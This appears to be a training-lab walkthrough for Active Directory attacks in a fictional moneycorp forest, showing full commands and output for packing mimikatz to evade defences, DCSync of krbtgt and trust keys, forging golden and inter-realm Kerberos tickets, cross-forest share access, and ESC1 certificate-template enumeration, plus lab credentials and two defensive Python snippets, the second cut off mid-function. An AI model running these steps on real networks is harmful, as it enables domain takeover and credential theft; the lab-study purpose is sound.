[sudo] password for wsluser: WSLToTh3Rescue!

root@dcorp-studentX:/mnt/c/AD/Tools/PEzor# ./PEzor.sh -unhook -antidebug -fluctuate=NA -format=dotnet -sleep=5 /mnt/c/AD/Tools/PEzor/mimikatz.exe -z 2 -p '"lsadump::dcsync /user:dcorp\mcorp$ /domain:dollarcorp.moneycorp.local" "exit"'

[?] Unhook enabled
[?] Anti-debug enabled
[?] Fluctuate: NA
[?] Output format: dotnet
[?] Waiting 5 seconds before executing the payload
[?] Processing /mnt/c/AD/Tools/PEzor/mimikatz.exe
[?] PE detected: /mnt/c/AD/Tools/PEzor/mimikatz.exe: PE32+ executable (console) x86-64, for MS Windows
[?] Building .NET executable
[?] Executing donut

[ Donut shellcode generator v1 (built Jan 15 2024 02:44:21)
[ Copyright (c) 2019-2021 TheWover, Odzhan

[ Instance type : Embedded
[ Module file : "/mnt/c/AD/Tools/PEzor/mimikatz.exe"
[ Entropy : Random names + Encryption
[ Compressed : aPLib (Reduced by 55%)
[ File type : EXE
[ Parameters : "lsadump::dcsync /user:dcorp\mcorp$ /domain:dollarcorp.moneycorp.local" "exit"
[ Target CPU : x86+amd64
[ AMSI/WDLP/ETW : continue
[ PE Headers : overwrite
[ Shellcode : "/tmp/tmp.deFRlDA39b/shellcode.cs"
[ Exit : Thread
[!] Done! Check /mnt/c/AD/Tools/PEzor/mimikatz.exe.packed.dotnet.exe: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows

root@dcorp-studentX:/mnt/c/AD/Tools/PEzor# mv /mnt/c/AD/Tools/PEzor/mimikatz.exe.packed.dotnet.exe /mnt/c/AD/Tools/PEzor/mimikatz-dcsync-trustkey.exe.packed.dotnet.exe

Perform a DCSync and retrieve the dcorp\mcorp$ trust key as follows.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 180 '/mnt/c/AD/Tools/PEzor/mimikatz-dcsync-trustkey.exe.packed.dotnet.exe'

[*] Output:

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:dcorp\mcorp$ /domain:dollarcorp.moneycorp.local
[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\mcorp$' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : mcorp$

** SAM ACCOUNT **

SAM Username : mcorp$
Account Type : 30000002 ( TRUST_ACCOUNT )
User Account Control : 00000820 ( PASSWD_NOTREQD INTERDOMAIN_TRUST_ACCOUNT )
Account expiration :
Password last change : 1/5/2024 6:43:16 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-1103
Object Relative ID : 1103

Credentials:
Hash NTLM: 4312d947e30071bf8857ded56876e212

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgtmcorp
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 7c66d95a09e42a74068694b9120672863ae78ae0b3c2ddd894552579288a907f
[snip]

Purge the domain admin ticket using Rubeus.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' purge

[*] rubeus output:

[*] Action: Purge Tickets
Luid: 0x0
[+] Tickets successfully purged!

We can now use the trust key to forge an inter-realm (cross-trust) ticket with Rubeus and use it to request a service ticket for a target service in the parent domain, here CIFS on mcorp-dc, as follows.
[server] sliver (dcorp-std_https) > inline-execute-assembly -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 'silver /user:Administrator /ldap /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:4312d947e30071bf8857ded56876e212 /sids:S-1-5-21-719815819-3726368948-3917688648-519 /nowrap'

[*] Output:

[*] Action: Build TGS

[*] Building PAC

[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)
[*] SID : S-1-5-21-1028785420-4100948154-1806204659
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ServiceKey : 4312D947E30071BF8857DED56876E212
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : 4312D947E30071BF8857DED56876E212
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : krbtgt
[*] Target : DOLLARCORP.MONEYCORP.LOCAL

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@dollarcorp.moneycorp.local'

[*] AuthTime : 1/22/2024 8:18:03 AM
[*] StartTime : 1/22/2024 8:18:03 AM
[*] EndTime : 1/22/2024 6:18:03 PM
[*] RenewTill : 1/29/2024 8:18:03 AM

[*] base64(ticket.kirbi):

doIGFjCCBhKgAw[snip]

[server] sliver (dcorp-std_https) > inline-execute-assembly -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 'asktgs /service:CIFS/mcorp-dc.MONEYCORP.LOCAL /dc:mcorp-dc.MONEYCORP.LOCAL /ptt /ticket:doIGFjCCBhKgAw[snip]'

[*] Successfully executed inline-execute-assembly (coff-loader)

[*] Got output:
[+] Success - Wrote 1042053 bytes to memory

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'CIFS/mcorp-dc.MONEYCORP.LOCAL'
[*] Using domain controller: mcorp-dc.MONEYCORP.LOCAL (172.16.1.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

ServiceName : CIFS/mcorp-dc.MONEYCORP.LOCAL
ServiceRealm : MONEYCORP.LOCAL
UserName : Administrator
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 1/22/2024 8:19:40 AM
EndTime : 1/22/2024 6:18:03 PM
RenewTill : 1/29/2024 8:18:03 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : sBJxMjHQwKA4hDHBTT4sFLqzDBoTmmtPbmD8X6WT5OY=

List the C$ share on mcorp-dc over CIFS to confirm access, as follows.

[server] sliver (dcorp-std_https) > ls '\\mcorp-dc.moneycorp.local\c$'

\\mcorp-dc.moneycorp.local\c$\ (14 items, 384.4 MiB)
====================================================
drwxrwxrwx $Recycle.Bin <dir> Sat Feb 16 22:14:50 -0700 2022
-r--r--r-- bootmgr 375.3 KiB Sat Jul 16 06:18:08 -0700 2022
-rw-rw-rw- BOOTNXT 1 B Sat Jul 16 06:18:08 -0700 2022
Lrw-rw-rw- Documents and Settings -> C:\Users 0 B Sat Feb 16 22:06:27 -0700 2024
drwxrwxrwx inetpub <dir> Mon Nov 08 09:25:59 -0700 2022
[snip]

Learning Objective 19
Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local, using dollarcorp's krbtgt hash.

Escalate privileges to Enterprise Admin using krbtgt hash

Using PEzor and Rubeus
We can use the krbtgt hash to move laterally from dollarcorp to the moneycorp domain, which can be retrieved using mimikatz-dcsync.exe.packed.dotnet.exe.

Use Rubeus to request a TGT as dcorp\svcadmin (domain administrator) to get Domain Admin rights.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe 'asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /show /ptt'

[*] Output:

[*] Action: Ask TGT

[*] Showing process : True
[*] Username : CMXYK90V
[*] Domain : WKIESTM5
[*] Password : HAB7FAYP
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 2520
[+] LUID : 0xaab77

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash: 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 699255
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIGAjCCBf6gAwIBB[snip]

[*] Target LUID: 0xaab77
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 1/15/2024 6:30:41 AM
EndTime : 1/15/2024 4:30:41 PM
RenewTill : 1/22/2024 6:30:41 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : fbhvuQhtRTYbD483RPrHQxsjm6hPnOhjtdU2YbhrfLk=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

DCSync to retrieve the dcorp\krbtgt hash.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 180 '/mnt/c/AD/Tools/PEzor/mimikatz-dcsync.exe.packed.dotnet.exe'

[*] Output:

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz(commandline) # lsadump::dcsync /user:dcorp\krbtgt
[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 9:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502

Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848

Purge the domain admin ticket using Rubeus.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' purge

[*] rubeus output:

[*] Action: Purge Tickets
Luid: 0x0
[+] Tickets successfully purged!

We can now use Rubeus to forge a cross-trust Golden Ticket that carries the parent domain's SIDs in its SID history (the /sids parameter), as follows.

[server] sliver (dcorp-std_https) > inline-execute-assembly -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 'golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-516,S-1-5-9 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /ptt'

[*] Action: Build TGT

[*] Building PAC

[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (DOLLARCORP)
[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ExtraSIDs : S-1-5-21-335606122-960912869-3279953914-516,S-1-5-9
[*] ServiceKey : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : krbtgt
[*] Target : dollarcorp.moneycorp.local

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@dollarcorp.moneycorp.local'

[*] AuthTime : 1/22/2024 9:20:12 AM
[*] StartTime : 1/22/2024 9:20:12 AM
[*] EndTime : 1/22/2024 7:20:12 PM
[*] RenewTill : 1/29/2024 9:20:12 AM

[*] base64(ticket.kirbi):

doIGZDCCBmCgA[snip]

[+] Ticket successfully imported!

[+] inlineExecute-Assembly Finished

Check whether we can access the filesystem on mcorp-dc.

[server] sliver (dcorp-std_https) > ls '\\mcorp-dc.moneycorp.local\c$'

\\mcorp-dc.moneycorp.local\c$\ (14 items, 384.4 MiB)
====================================================
drwxrwxrwx $Recycle.Bin <dir> Sat Feb 16 22:14:50 -0700 2022
-r--r--r-- bootmgr 375.3 KiB Sat Jul 16 06:18:08 -0700 2022
-rw-rw-rw- BOOTNXT 1 B Sat Jul 16 06:18:08 -0700 2022
Lrw-rw-rw- Documents and Settings -> C:\Users 0 B Sat Feb 16 22:06:27 -0700 2024
drwxrwxrwx inetpub <dir> Mon Nov 08 09:25:59 -0700 2022
[snip]

Learning Objective 20
With DA privileges on dollarcorp.moneycorp.local, get access to the SharedwithDCorp share on the DC of the eurocorp.local forest.

Access the SharedwithDCorp share on eurocorp.local

Using PEzor, Sa-Netshares, & Rubeus
We can use the cross-trust key, which can be retrieved from dcorp-dc, to move laterally from dollarcorp to the eurocorp domain.

Note: Because SID filtering is applied across the forest trust, we cannot abuse SID history injection here. Instead, we gain whatever privileges the current user (an Enterprise Admin in the moneycorp forest) has been granted in the trusted eurocorp forest. We cannot escalate to Enterprise Admins directly as before, but we can use these privileges to access resources that were explicitly shared with us.
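
The note above distinguishes the intra-forest path, where mcorp-dc honours the Golden Ticket's /sids, from the forest trust to eurocorp, where SID filtering applies. As an added illustration that is not part of the lab, the following simplified model applies two of the filtering rules (well-known SIDs are dropped, and domain SIDs are dropped unless they belong to a domain of the trusted forest) to the SIDs used in this lab; the eurocorp RID-512 SID is a constructed example, and the full MS-PAC rule set contains further entries not modelled here.

```python
# Domain SIDs taken from the lab output: dcorp (child) and mcorp (forest root) form the
# moneycorp forest; ecorp is the separately trusted eurocorp forest.
DCORP = "S-1-5-21-719815819-3726368948-3917688648"
MCORP = "S-1-5-21-335606122-960912869-3279953914"
ECORP = "S-1-5-21-3333069040-3914854601-3606488808"
MONEYCORP_FOREST = {DCORP, MCORP}

def domain_of(sid):
    """Return the domain prefix of an S-1-5-21-X-Y-Z-RID account/group SID, else None."""
    parts = sid.split("-")
    if len(parts) == 8 and parts[:4] == ["S", "1", "5", "21"]:
        return "-".join(parts[:7])
    return None

def filter_extra_sids(extra_sids, trusted_forest_domains, intra_forest):
    """Simplified SID-filtering model. Returns (kept, dropped) where dropped maps SID -> reason.
    Intra-forest (parent/child) trusts do not filter by default, so everything passes.
    Across a forest trust two rules are modelled: well-known/non-domain SIDs are dropped,
    and domain SIDs are dropped unless they belong to a domain of the trusted forest."""
    if intra_forest:
        return list(extra_sids), {}
    kept, dropped = [], {}
    for sid in extra_sids:
        dom = domain_of(sid)
        if dom is None:
            dropped[sid] = "well-known or non-domain SID (e.g. Enterprise Domain Controllers)"
        elif dom not in trusted_forest_domains:
            dropped[sid] = "SID is not from a domain of the trusted forest"
        else:
            kept.append(sid)  # belongs to the trusted forest: confers only what that group
                              # has explicitly been granted in the trusting forest
    return kept, dropped

# Constructed scenarios. MCORP-516 and S-1-5-9 are the SIDs the golden ticket above carries;
# ECORP-512 is a constructed eurocorp SID that a forest trust must never accept from outside.
GOLDEN_TICKET_SIDS = [MCORP + "-516", "S-1-5-9"]
CROSS_FOREST_ATTEMPT = [ECORP + "-512", MCORP + "-516", "S-1-5-9"]

def lab_comparison():
    """Child -> parent (same forest) vs. dollarcorp -> eurocorp (forest trust, SID filtering on)."""
    intra = filter_extra_sids(GOLDEN_TICKET_SIDS, MONEYCORP_FOREST, intra_forest=True)
    cross = filter_extra_sids(CROSS_FOREST_ATTEMPT, MONEYCORP_FOREST, intra_forest=False)
    return {"intra_forest": intra, "forest_trust": cross}

if __name__ == "__main__":
    for name, (kept, dropped) in lab_comparison().items():
        print(name, "kept:", kept)
        for sid, why in dropped.items():
            print("   dropped", sid, "-", why)
```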

Gain a session on dcorp-dc as showcased in LO-8 and switch to this session.

[*] Session f6a3293d dcorp-dc_tcp - 172.16.100.X:50234->dcorp-std_https-> (dcorp-dc) - windows/amd64 - Tue, 23 Jan 2024 03:03:06 PST

[server] sliver (dcorp-std_https) > sessions -i f6a3293d

[*] Active session dcorp-dc_tcp (f6a3293d)

To retrieve the dcorp\ecorp$ trust key, spawn a new Ubuntu prompt and use PEzor to create a compatible .NET mimikatz binary with the arguments "privilege::debug" "lsadump::trust /patch" "exit".

wsluser@dcorp-studentX:~$ sudo su
[sudo] password for wsluser: WSLToTh3Rescue!

root@dcorp-studentX:/home/wsluser# cd /mnt/c/AD/Tools/PEzor/

root@dcorp-studentX:/mnt/c/AD/Tools/PEzor# ./PEzor.sh -unhook -antidebug -fluctuate=NA -format=dotnet -sleep=5 /mnt/c/AD/Tools/PEzor/mimikatz.exe -z 2 -p '"privilege::debug" "lsadump::trust /patch" "exit"'

[?] Unhook enabled
[?] Anti-debug enabled
[?] Fluctuate: NA
[?] Output format: dotnet
[?] Waiting 5 seconds before executing the payload
[?] Processing /mnt/c/AD/Tools/PEzor/mimikatz.exe
[?] PE detected: /mnt/c/AD/Tools/PEzor/mimikatz.exe: PE32+ executable (console) x86-64, for MS Windows
[?] Building .NET executable
[?] Executing donut

[ Donut shellcode generator v1 (built Jan 15 2024 02:44:21)
[ Copyright (c) 2019-2021 TheWover, Odzhan

[ Instance type : Embedded
[ Module file : "/mnt/c/AD/Tools/PEzor/mimikatz.exe"
[ Entropy : Random names + Encryption
[ Compressed : aPLib (Reduced by 55%)
[ File type : EXE
[ Parameters : "privilege::debug" "lsadump::trust /patch" "exit"
[ Target CPU : x86+amd64
[ AMSI/WDLP/ETW : continue
[ PE Headers : overwrite
[ Shellcode : "/tmp/tmp.mf9KoSCdIB/shellcode.cs"
[ Exit : Thread
[!] Done! Check /mnt/c/AD/Tools/PEzor/mimikatz.exe.packed.dotnet.exe: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows

root@dcorp-studentX:/mnt/c/AD/Tools/PEzor# mv /mnt/c/AD/Tools/PEzor/mimikatz.exe.packed.dotnet.exe /mnt/c/AD/Tools/PEzor/mimikatz-trustkey.exe.packed.dotnet.exe

Execute mimikatz-trustkey.exe.packed.dotnet.exe and retrieve the ecorp$ trust key as follows.
[server] sliver (dcorp-dc_tcp) > ps
[snip]
2092 3612 NT AUTHORITY\SYSTEM x86_64 svchost.exe 0

[server] sliver (dcorp-std_https) > execute-assembly -P 2092 -p 'C:\windows\system32\taskhostw.exe' -t 180 '/mnt/c/AD/Tools/PEzor/mimikatz-trustkey.exe.packed.dotnet.exe'

[*] Output:

mimikatz # lsadump::trust /patch

[snip]
Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)

[ In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL

* 1/1/2024 3:42:54 AM - CLEAR - [snip]
* aes256_hmac 14a5b2bba40a25718b9436a8a37528611620bcfce68b25dc7de6915f06316c6c
* aes128_hmac 843f6fd516d6b012a4e2e8d4b8830bcc
* rc4_hmac_nt b70359171eaba09b47b6628a96acd306

[snip]

Purge the domain admin ticket using Rubeus.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' purge

[*] rubeus output:

[*] Action: Purge Tickets
Luid: 0x0
[+] Tickets successfully purged!

Next, use Rubeus and the trust key to forge the inter-realm TGT.

[server] sliver (dcorp-std_https) > inline-execute-assembly -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 'silver /user:Administrator /ldap /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /aes256:14a5b2bba40a25718b9436a8a37528611620bcfce68b25dc7de6915f06316c6c /sid:S-1-5-21-719815819-3726368948-3917688648 /nowrap'

[*] rubeus output:

[*] Action: Build TGS
[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)
[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ServiceKey : 37AAA399EE910656637F1C876502FA72797BF708F7B0BD0FE4925FDE75CA1B65
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : 37AAA399EE910656637F1C876502FA72797BF708F7B0BD0FE4925FDE75CA1B65
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : krbtgt
[*] Target : DOLLARCORP.MONEYCORP.LOCAL

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@dollarcorp.moneycorp.local'

[*] AuthTime : 1/22/2024 9:34:05 AM
[*] StartTime : 1/22/2024 9:34:05 AM
[*] EndTime : 1/22/2024 7:34:05 PM
[*] RenewTill : 1/29/2024 9:34:05 AM

[*] base64(ticket.kirbi):

doIGHDCCBhig[snip]

[+] inlineExecute-Assembly Finished

Next, request a TGS for a service on eurocorp-dc. In this case we request a ticket for the CIFS service.
[server] sliver (dcorp-std_https) > inline-execute-assembly -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 'asktgs /service:CIFS/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket:doIGHDCCBhig[snip]'

[*] rubeus output

[*] Action: Ask TGS

[*] Using domain controller: eurocorp-dc.eurocorp.local (172.16.15.1)
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/eurocorp-dc.eurocorp.local'
[+] TGS request successful!
[*] base64(ticket.kirbi):

[........snip........]

ServiceName : cifs/eurocorp-dc.eurocorp.local
ServiceRealm : EUROCORP.LOCAL
UserName : Administrator
UserRealm : dollarcorp.moneycorp.local
StartTime : 10/1/2022 4:05:54 AM
EndTime : 10/1/2022 2:05:54 PM
RenewTill : 10/8/2022 4:05:54 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : kmxfbuXjUiZ5LATsY9E7v2+6uM/Ua75bWgiJuCMhtQw=

[+] Ticket successfully imported!

[+] inlineExecute-Assembly Finished

Since we can only access explicitly shared resources, let us enumerate the shares on eurocorp-dc using the sa-netshares BOF.
[server] sliver (dcorp-std_https) > sa-netshares -t 60 'eurocorp-dc.eurocorp.local'

[*] Successfully executed sa-netshares (coff-loader)

[*] Got output:
Share:
---------------------eurocorp-dc.eurocorp.local----------------------------------
ADMIN$
C$
IPC$
NETLOGON
SharedwithDCorp
SYSVOL

Checking CIFS access, we find that we can read the SharedwithDCorp share.
[server] sliver (dcorp-std_https) > ls '\\eurocorp-dc.eurocorp.local\SharedwithDcorp'

\\eurocorp-dc.eurocorp.local\SharedwithDcorp\ (1 item, 29 B)
============================================================
-rw-rw-rw- secret.txt 29 B Mon Jan 18 04:18:07 -0700 2024

[server] sliver (dcorp-std_https) > cat '\\eurocorp-dc.eurocorp.local\SharedwithDcorp\secret.txt'

Dollarcorp DAs can read this!

Learning Objective 21
• Check if AD CS is used by the target forest and find any vulnerable / abusable templates.

• Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin.

Enumerating AD CS
Using Certify
We can use the Certify tool from the armory to check for AD CS in moneycorp. The cas command is used to find information about all registered CAs.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Certify.exe' cas

[*] certify output:

[*] Action: Find certificate authorities

[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'
[*] Root CAs

Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
Cert Thumbprint : C57338DA8D0C5518C4587B1133265414D37C0573
Cert Serial : 7AC830DC3779E2924CBB43263C2F1B62
Cert Start Date : 11/8/2023 8:19:06 AM
Cert End Date : 11/8/2028 8:29:06 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local

[*] NTAuthCertificates - Certificates that enable authentication:

Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
Cert Thumbprint : C57338DA8D0C5518C4587B1133265414D37C0573
Cert Serial : 7AC830DC3779E2924CBB43263C2F1B62
[snip]

Certify completed in 00:00:18.4901272

We can list all the templates using the find command. Going through the output we can find some interesting templates.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Certify.exe' find

[*] certify output:

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'

[snip]

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SmartCardEnrollment-Agent
Schema Version : 2
Validity Period : 2 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Certificate Request Agent
mspki-certificate-application-policy : Certificate Request Agent
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\Domain Users S-1-5-21-1874506631-3219952063-538504511-513

[snip]

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : HTTPSCertificates
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT

[snip]

Privilege Escalation to DA and EA using ESC1
Using Certify, Openssl and Rubeus
The template HTTPSCertificates looks interesting. Let's get more information about it, as it allows the requestor to supply the subject name.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Certify.exe' 'find /enrolleeSuppliesSubject'

[*] certify output:

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'
[*] Listing info about the Enterprise CA 'moneycorp-MCORP-DC-CA'

Enterprise CA Name : moneycorp-MCORP-DC-CA
DNS Hostname : mcorp-dc.moneycorp.local
FullName : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA

[snip]

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : HTTPSCertificates
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\RDPUsers S-1-5-21-1874506631-3219952063-538504511-1116

[snip]

The HTTPSCertificates template grants enrollment rights to the RDPUsers group and allows the requestor to supply a Subject Name. Recall that dcorp\studentX is a member of the RDPUsers group. This means that we can request a certificate for any user as dcorp\studentX.
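
As an added hardening example (not Certify's own code and not part of the lab): the conditions that make HTTPSCertificates abusable can be checked mechanically over Certify's find output, so a defender can audit every template in the forest instead of reading them by hand. The sample output below is constructed in the shape of the listing above (the dcorp\Domain Admins entry is an added constructed line), and the set of broad groups treated as low-privileged is supplied by the auditor, since a group such as RDPUsers is only "everyone" by local knowledge.

```python
import re

# Broad principals that make enrollment effectively open; the auditor extends this set
# with organisation-specific wide groups (the lab's RDPUsers is such a group).
LOW_PRIV_PRINCIPALS = {"domain users", "authenticated users", "everyone", "domain computers", "users"}
# EKUs that let the issued certificate authenticate to AD (the ESC1 authentication test).
AUTH_EKUS = {"client authentication", "pkinit client authentication", "smart card logon", "any purpose"}

def parse_certify_templates(text):
    """Split Certify-style 'find' output into one dict per template; keys are lowercased and
    every value is a list so wrapped or multi-valued fields (Enrollment Rights) survive."""
    templates, current, last_key = [], None, None
    for line in text.splitlines():
        if not line.strip() or line.strip().endswith("Permissions"):
            continue  # blank lines and the 'Permissions' section headers carry no value
        if line.lstrip().startswith("CA Name"):
            current, last_key = {}, None
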